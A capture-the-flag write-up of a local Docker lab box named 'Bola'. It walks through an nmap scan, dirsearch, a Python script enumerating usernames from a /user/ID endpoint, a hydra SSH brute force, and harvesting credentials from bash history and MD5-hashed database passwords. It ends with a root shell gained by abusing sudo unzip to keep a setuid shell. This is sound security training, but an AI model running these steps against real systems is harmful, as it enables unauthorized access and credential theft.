Bola

Let's Download and start the Docker container

Reconnaissance

┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap -sV -A 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-07-14 14:04 +08
Nmap scan report for 172.17.0.2
Host is up (0.0000070s latency).
Not shown: 998 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 4f:3f:8c:fb:88:da:ea:37:d6:9f:c3:bd:f4:8e:18:1b (ECDSA)
|_  256 2e:a1:36:ff:8b:bb:0d:b3:c8:cb:4a:81:cb:37:77:31 (ED25519)
12345/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Site doesn't have a title (application/json).
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.01 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds

We'll find two open ports. http://172.17.0.2:12345 connect to http. Since it showed me nothing, I decided to search hidden directories using dirsearch.

┌──(zwique㉿zwique)-[~/Downloads]
└─$ dirsearch -u http://172.17.0.2:12345/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkgresources import DistributionNotFound, VersionConflict

  |.         |    v0.4.3
 (| ) (/(_ (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/zwique/Downloads/reports/http_172.17.0.2_12345/__25-07-14_14-07-06.txt

Target: http://172.17.0.2:12345/

[14:07:06] Starting:
[14:07:26] 400 -  167B  - /console
[14:07:34] 405 -  153B  - /login
[14:07:48] 308 -  245B  - /user  ->  http://172.17.0.2:12345/user/
[14:07:48] 400 -   54B  - /user/
[14:07:48] 200 -   73B  - /user/3
[14:07:48] 200 -   69B  - /user/1
[14:07:48] 200 -   65B  - /user/2

Task Completed

Great, we've just found the json list of users. So here is the idea of getting access.

Exploit

1. Taking every username listed in json form

2. Bruteforcing their passwords on SSH port using hydra

Here is the python script that allows you to get list of usernames.

import requests

base_url = "http://172.17.0.2:12345/user/"
timeout_ids = 10
current_id = 1
failures = 0

with open("users.txt", "w") as f:
    while failures < timeout_ids:
        url = f"{base_url}{current_id}"
        response = requests.get(url)

        if response.status_code == 200:
            try:
                data = response.json()
                username = data.get("username")
                if username:
                    print(f"[{current_id}] username: {username}")
                    f.write(username + "\n")
                    failures = 0
                else:
                    print(f"[{current_id}] No username in response.")
                    failures += 1
            except Exception as e:
                print(f"[{current_id}] Invalid JSON: {e}")
                failures += 1
        else:
            print(f"[{current_id}] No user (status {response.status_code})")
            failures += 1

        current_id += 1

hydra -L users.txt  ssh://172.17.0.2 -P /usr/share/wordlists/rockyou.txt

[22][ssh] host: 172.17.0.2   login: steven   password: steven

Login as steven user using SSH. steven@172.17.0.2 Then I ran linpeas.sh tool in order to find any useful information. Then, it seemed that .bash_history file contained vaild information.

steven@7460f532dd7d:~$ cat .bash_history 
mysql -y steven -psteven
mysql -u steven -psteven
exit
mysql -u steven -psteven
exit
ls
unzip secretitosecretazo.zip 
ls
cp secretitosecretazo.zip /home
ls
exit
sudo -l
cd /home
ls
exit

mysql -u steven -psteven
SHOW DATABASES;
USE secretito;
SELECT * FROM secretito;
MariaDB [secretito]> SELECT * FROM usuarios;
+----+-----------+----------------------------------+
| id | usuario   | password                         |
+----+-----------+----------------------------------+
|  1 | alice     | 8bdffaa69d328c1d4ae3aeadc97de223 |
|  2 | bob       | d8578edf8458ce06fbc5bb76a58c5ca4 |
|  3 | charlie   | e99a18c428cb38d5f260853678922e03 |
|  4 | baluadmin | aa87ddc5b4c24406d26ddad771ef44b0 |
|  5 | diana     | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
5 rows in set (0.002 sec)

Very well!!! We've just found MD-5 hashed passwords of users. Crack the hashes using john/hashcat or even CrackStation.

The one user containing suspicious key word is baluadmin.balueadmin:estrella

After logging in as bluadmin, I've checked what are sudo command I'm allowed to run without any password of root.

baluadmin@7460f532dd7d:~$ sudo -l
Matching Defaults entries for baluadmin on 7460f532dd7d:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
    use_pty

User baluadmin may run the following commands on 7460f532dd7d:
    (ALL) NOPASSWD: /usr/bin/unzip

Root

baluadmin@1f62a5cad7a9:~$ cp /bin/sh .
baluadmin@1f62a5cad7a9:~$ chmod +s sh
baluadmin@1f62a5cad7a9:~$ zip shell.zip sh
  adding: sh (deflated 52%)
baluadmin@1f62a5cad7a9:~$ sudo unzip -K shell.zip
Archive:  shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: sh
baluadmin@1f62a5cad7a9:~$ ./sh -p
id
uid=1001(baluadmin) gid=1001(baluadmin) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluadmin)
#

GG. Since it was interesting for me to find out what was inside secretitosecretazo.zip file, I extracted it as a root.

cd /
ls
bin   etc   lib64  opt   rootshell.sh  secretitosecretazo.zip  tmp
boot  home  media  proc  run           srv                     usr
dev   lib   mnt    root  sbin          sys                     var
unzip secretitosecretazo.zip
Archive:  secretitosecretazo.zip
 extracting: sorpresitajiji.txt
cat sorpresitajiji.txt
root:pedazodepasswordchaval
#